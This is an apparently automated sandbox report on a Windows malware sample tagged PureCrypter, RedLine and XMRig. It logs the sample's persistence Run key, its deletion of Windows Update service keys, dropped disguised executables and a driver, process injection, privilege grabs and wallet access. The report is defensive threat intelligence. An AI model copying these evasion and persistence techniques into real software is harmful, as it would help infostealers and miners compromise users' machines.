Malware Analysis Report

2025-05-28 17:26

Sample ID 230112-lxy3psbe2t
Target 76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d
SHA256 76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d
Tags
purecrypter redline xmrig 5633308507 evasion infostealer loader miner persistence spyware trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d

Threat Level: Known bad

The file 76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d was found to be: Known bad.

Malicious Activity Summary

purecrypter redline xmrig 5633308507 evasion infostealer loader miner persistence spyware trojan upx

Modifies security service

xmrig

RedLine

PureCrypter

Detect PureCrypter loader

Suspicious use of NtCreateUserProcessOtherParentProcess

XMRig Miner payload

Stops running service(s)

UPX packed file

Executes dropped EXE

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Program Files directory

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: LoadsDriver

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Gathers network information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-01-12 09:55

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-01-12 09:55

Reported

2023-01-12 09:57

Platform

win10-20220812-en

Max time kernel

150s

Max time network

131s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detect PureCrypter loader

loader
Description Indicator Process Target
N/A N/A N/A N/A

Modifies security service

evasion
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters C:\Windows\System32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security C:\Windows\System32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 C:\Windows\System32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 C:\Windows\System32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo C:\Windows\System32\reg.exe N/A

PureCrypter

trojan loader purecrypter

RedLine

infostealer redline

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A

Stops running service(s)

evasion

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsHost = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\GooglePrograms\\WindowsHost.exe\"" C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Windows\WindowsHost N/A
File created C:\Program Files\Google\Libs\g.log C:\Windows\System32\cmd.exe N/A
File created C:\Program Files\Google\Libs\g.log C:\Windows\System32\cmd.exe N/A
File created C:\Program Files\Windows\WindowsHost C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe N/A

Enumerates physical storage devices

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2204 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Windows\SysWOW64\cmd.exe
PID 2268 wrote to memory of 4292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 2268 wrote to memory of 4292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 2268 wrote to memory of 4292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 2204 wrote to memory of 4736 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2204 wrote to memory of 4736 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2204 wrote to memory of 4736 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2204 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe
PID 2204 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe
